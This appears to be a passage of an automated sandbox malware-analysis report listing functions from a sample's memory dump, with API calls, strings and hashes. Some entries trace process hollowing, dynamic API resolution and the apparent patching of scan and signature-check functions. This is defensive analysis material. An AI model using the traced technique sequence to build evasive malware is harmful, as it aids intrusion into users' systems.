Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction Fuzzy Hash: 13F0A97260431F5BEB208DD5CC54EF7F3DCAE891657050929E846D7209FB25D801C760

Function 02905814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 02905832

Part of subcall function 02905A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02905A94
Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AB2
Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AD0
Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
Part of subcall function 02905A78: RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction ID: 16f02471ba9fe13a574cc3a7b80487851a15153edd7f3eeb9609745ce476e814
Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
Instruction Fuzzy Hash: 05E06571A002188FCB14DE6888C0A8637D8BF08750F8109A5ED58DF38AD3B0DD608FE0

Function 02907D8C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02907DA0

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: 1528a2672e1e1620418b0281b5a3596dc00ba3e5da5ef5e322f678c02348a156
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: 81D012722091146AD220955A5C84EE75ADDCBC5771F10062EB698C71C0D7208C0186B1

Function 0291A14C Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA

Process32First.KERNEL32(?,00000128), ref: 0291A15D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressProc$FirstHandleModuleProcess32
String ID:
API String ID: 2774106396-0
Opcode ID: e790caa397448e4931962de20df82d37cfc03ae9caaace0e83eede1f235c0b69
Instruction ID: a25a28c5d341e297ec71dd8b50c6ef6fdf41a8a0b056526f096803648528cabd
Opcode Fuzzy Hash: e790caa397448e4931962de20df82d37cfc03ae9caaace0e83eede1f235c0b69
Instruction Fuzzy Hash: B1C08063A02124179B2069F52C884D3474DCD461F73044862B509D3101D3754C10D590

Function 0291A16C Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA

Process32Next.KERNEL32(?,00000128), ref: 0291A17D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressProc$HandleModuleNextProcess32
String ID:
API String ID: 2237597116-0
Opcode ID: 7df12df6232c38436d32e84e09366a639ad7ccd982716454dde86a639c2cd844
Instruction ID: 9fa18e603e75998afbc597b15d5c753b19c99717959a0cacab8b090f6282e47c
Opcode Fuzzy Hash: 7df12df6232c38436d32e84e09366a639ad7ccd982716454dde86a639c2cd844
Instruction Fuzzy Hash: E3C08073A02124175F2069F63C844D3474DCD451F73040C62B515D3101E3254C10D190

Function 02907E08 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
Instruction ID: 2e5da3f78dccf016117522990745bd99cc4fb1d8176a61b730efcf1eb642c5ea
Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
Instruction Fuzzy Hash: C4C08CA16072080E6A5065FC0CC459B428C09841383642A71E039C62E2D321A8232810

Function 02907E2C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02921221,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,ScanString), ref: 02907E37

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
Instruction ID: ef8899aaa4fb249eebb8d9e094333032543f87b5af2f1f34506f7c2fa180042e
Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
Instruction Fuzzy Hash: 5CC08CA060320C0E6E9065FC1CC068B428D0D841343603A31E03CD62E2D311A8322810

Function 02904C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02904C37

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction ID: 06ca935c9b844225799f0f4b174ebf980334b3db410e16338633fc971058759f
Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction Fuzzy Hash: 3EC012A26002384FEB215A989CC079562CCDB49395B1410A1E508D7280E3609C005A64

Function 02927D84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(?,00000000,Function_00027D78,00000000,00000001), ref: 02927D94

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: f319377a747f52c5b3744fc910e00ee68094a6f24ce9f7597065ca0b7ca9b673
Instruction ID: 3ff7930bf9610d4b4f2708855f65909ebf841c26a094aaa4715b0396ffa06e0f
Opcode Fuzzy Hash: f319377a747f52c5b3744fc910e00ee68094a6f24ce9f7597065ca0b7ca9b673
Instruction Fuzzy Hash: 71C092F1BD53507EF6205AB55CC2F73618DEB44B01F100912B600EE6C1D5E248104E24

Function 029015CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 029015E2

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eddf2043077eb8cf831c19769000fcf6f6f7e1d38a5d13da91bf8d8bcb9e6f33
Instruction ID: 3b6bbf51b5411bfdc435d1be33a7553caca89dbeef972b8d01c5d3958d0a9846
Opcode Fuzzy Hash: eddf2043077eb8cf831c19769000fcf6f6f7e1d38a5d13da91bf8d8bcb9e6f33
Instruction Fuzzy Hash: BEF017F0B557004FEB05DFB999813267BD6E789348F24857AEA0AEB3D8E77184128B10

Function 02901682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 029016A4

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ace03c0a34ab6877b6ce19723b253339304f0752fc9b4d55a16ad1c507fd9e
Instruction ID: 941f22338c48c7919ca221dc46625a4b3074624cb7f0f245b5ce0483ad05dfb8
Opcode Fuzzy Hash: f6ace03c0a34ab6877b6ce19723b253339304f0752fc9b4d55a16ad1c507fd9e
Instruction Fuzzy Hash: ACF090B2A447996FE7119E5A9CC0792BBD4FF44314F050539EA4997380D770A8108B94

Function 029016E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02901704

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: d4a7782802fa7c4241f7d70762e1ec9342a410fd30a71d37dc181300ee996d2b
Instruction ID: 40e8cc9821dce34825d5e37245dd366b298d94e05bdd3e8f12d2c08a1da2649e
Opcode Fuzzy Hash: d4a7782802fa7c4241f7d70762e1ec9342a410fd30a71d37dc181300ee996d2b
Instruction Fuzzy Hash: 7CE02C713003046FE7205A7D4CC0B22BBCDEF88334F240A75F209CB2C1C2A0E8008B24

Non-executed Functions

Function 02919EB0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA

Strings

Process32Next, xrefs: 02919F52
Thread32First, xrefs: 02919F88
Thread32Next, xrefs: 02919F9A
Module32Next, xrefs: 02919FBE
CreateToolhelp32Snapshot, xrefs: 02919ED4
kernel32.dll, xrefs: 02919EBF
Heap32First, xrefs: 02919F0A
Process32First, xrefs: 02919F40
Heap32ListNext, xrefs: 02919EF8
Process32FirstW, xrefs: 02919F64
Module32NextW, xrefs: 02919FE2
Toolhelp32ReadProcessMemory, xrefs: 02919F2E
Heap32ListFirst, xrefs: 02919EE6
Heap32Next, xrefs: 02919F1C
Module32FirstW, xrefs: 02919FD0
Module32First, xrefs: 02919FAC
Process32NextW, xrefs: 02919F76

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 12db1a792d038968277a68a6be14a776bd28d63a1256ba921b28b76bfebf1b7c
Instruction ID: 06c0f3f002bf5048ae22ccb1e193c5c6e6cdde0c3931df604fec88b034860214
Opcode Fuzzy Hash: 12db1a792d038968277a68a6be14a776bd28d63a1256ba921b28b76bfebf1b7c
Instruction Fuzzy Hash: 0131C3B2E85328AFFB10AFB5D8C9E3637ADEB8A70070009A5A505CF684D7759C20CF55

Function 02918170 Relevance: 54.1, APIs: 8, Strings: 22, Instructions: 1626nativethreadprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0293F3BC,0293F3AC,OpenSession,0293F384,02919CD0,ScanString,0293F384), ref: 0291866E
GetThreadContext.KERNEL32(00000000,0293F400,ScanString,0293F384,02919CD0,UacInitialize,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,UacInitialize,0293F384), ref: 02918A07
NtReadVirtualMemory.NTDLL(00000000,-00000008,0293F4D4,00000004,0293F4DC), ref: 02918C64
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02918DDF

Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,0293F4DC), ref: 02919433
NtWriteVirtualMemory.NTDLL(00000000,-00000008,0293F4D8,00000004,0293F4DC), ref: 029195A6
SetThreadContext.KERNEL32(00000000,0293F400,ScanBuffer,0293F384,02919CD0,ScanString,0293F384,02919CD0,Initialize,0293F384,02919CD0,00000000,-00000008,0293F4D8,00000004,0293F4DC), ref: 0291971C
NtResumeThread.NTDLL(00000000,00000000), ref: 02919729

Part of subcall function 02917CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
Part of subcall function 02917CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
Part of subcall function 02917CA8: NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
Part of subcall function 02917CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12

Strings

I_QueryTagInformation, xrefs: 02919B05
NtOpenProcess, xrefs: 02919B55
bcrypt, xrefs: 0291997D, 02919991, 029199A5
UacScan, xrefs: 02918273, 0291848B, 02918A8C, 02918E88, 02918FFC, 029197A6
Initialize, xrefs: 029184EA, 02918AFD, 02918C84, 0291906D, 029192CF, 0291943F, 029195B2, 02919817
ntdll, xrefs: 02919A2A, 02919A3E, 02919AF6, 02919B46, 02919B5A
UacInitialize, xrefs: 02918432, 02918793, 02918917, 02918A1B, 02918E17, 02918F8B, 02919735
BCryptRegisterProvider, xrefs: 029199A0
BCryptVerifySignature, xrefs: 02919978
ScanString, xrefs: 02918202, 029183AD, 0291855B, 02918988, 02918B6E, 02918CF5, 02919182, 02919340, 029194B0, 02919623, 0291990E, 029199BB
MiniDumpWriteDump, xrefs: 02919B19
SLGetLicenseInformation, xrefs: 0291875F
sppc, xrefs: 02918776
BCryptQueryProviderRegistration, xrefs: 0291998C
NtReadVirtualMemory, xrefs: 02919A25
MiniDumpReadDumpStream, xrefs: 02919B2D
NtSetSecurityObject, xrefs: 02919B41
dbgcore, xrefs: 02919B1E, 02919B32
OpenSession, xrefs: 029181A9, 029185CC, 0291867E, 02919A54, 02919B70
advapi32, xrefs: 02919B0A
ScanBuffer, xrefs: 029182CC, 02918354, 029186EF, 02918804, 029188A6, 02918BDF, 02918D66, 02918EF9, 029190DE, 029191F3, 029193B1, 02919521, 02919694, 02919888, 02919AA6, 02919BE1
NtOpenObjectAuditAlarm, xrefs: 02919A39, 02919AF1

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2533507481-51457883
Opcode ID: e971c4d0c22b4fd04fdc2640f71b23fc2ccafaffc82b991ad27e2ae44cd4f300
Instruction ID: cb45c2f2beee22c792f3ef6afa8ab2fedeb6ae4b8155a9c40135e4cc48334c8d
Opcode Fuzzy Hash: e971c4d0c22b4fd04fdc2640f71b23fc2ccafaffc82b991ad27e2ae44cd4f300
Instruction Fuzzy Hash: ACE21535A1011C9FEB11EBA4CDD0EDEB3FAAFC5710F1055A1A209AB294DE30AE46CF55

Function 0291816E Relevance: 54.1, APIs: 8, Strings: 22, Instructions: 1577nativeprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0293F3BC,0293F3AC,OpenSession,0293F384,02919CD0,ScanString,0293F384), ref: 0291866E
GetThreadContext.KERNEL32(00000000,0293F400,ScanString,0293F384,02919CD0,UacInitialize,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,UacInitialize,0293F384), ref: 02918A07
NtReadVirtualMemory.NTDLL(00000000,-00000008,0293F4D4,00000004,0293F4DC), ref: 02918C64
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02918DDF

Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

Strings

I_QueryTagInformation, xrefs: 02919B05
NtOpenProcess, xrefs: 02919B55
bcrypt, xrefs: 0291997D, 02919991, 029199A5
UacScan, xrefs: 02918273, 0291848B, 02918A8C, 02918E88, 02918FFC, 029197A6
Initialize, xrefs: 029184EA, 02918AFD, 02918C84, 0291906D, 029192CF, 0291943F, 029195B2, 02919817
ntdll, xrefs: 02919A2A, 02919A3E, 02919AF6, 02919B46, 02919B5A
UacInitialize, xrefs: 02918432, 02918793, 02918917, 02918A1B, 02919735
BCryptRegisterProvider, xrefs: 029199A0
BCryptVerifySignature, xrefs: 02919978
ScanString, xrefs: 02918202, 029183AD, 0291855B, 02918988, 02918B6E, 02918CF5, 02919182, 02919340, 029194B0, 02919623, 0291990E, 029199BB
MiniDumpWriteDump, xrefs: 02919B19
SLGetLicenseInformation, xrefs: 0291875F
sppc, xrefs: 02918776
BCryptQueryProviderRegistration, xrefs: 0291998C
NtReadVirtualMemory, xrefs: 02919A25
MiniDumpReadDumpStream, xrefs: 02919B2D
NtSetSecurityObject, xrefs: 02919B41
dbgcore, xrefs: 02919B1E, 02919B32
OpenSession, xrefs: 029181A9, 029185CC, 0291867E, 02919A54, 02919B70
advapi32, xrefs: 02919B0A
ScanBuffer, xrefs: 029182CC, 02918354, 029186EF, 02918804, 029188A6, 02918BDF, 02918D66, 02918EF9, 029190DE, 029191F3, 029193B1, 02919521, 02919694, 02919888, 02919AA6, 02919BE1
NtOpenObjectAuditAlarm, xrefs: 02919A39, 02919AF1

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3979268988-51457883
Opcode ID: d798f66ffdb3a49bc23036b98f2922ac38f5b76b3bd11625abe596938fca1b41
Instruction ID: db22322554015d2ab7a8b0c47a75f123d3f6fb714c83e8ba3942a755522ba66b
Opcode Fuzzy Hash: d798f66ffdb3a49bc23036b98f2922ac38f5b76b3bd11625abe596938fca1b41
Instruction Fuzzy Hash: 67E21535A1011C9FEB11EBA4CDD0EDEB3FAAFC5710F1055A1A209AB294DE30AE46CF51

Function 029058B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

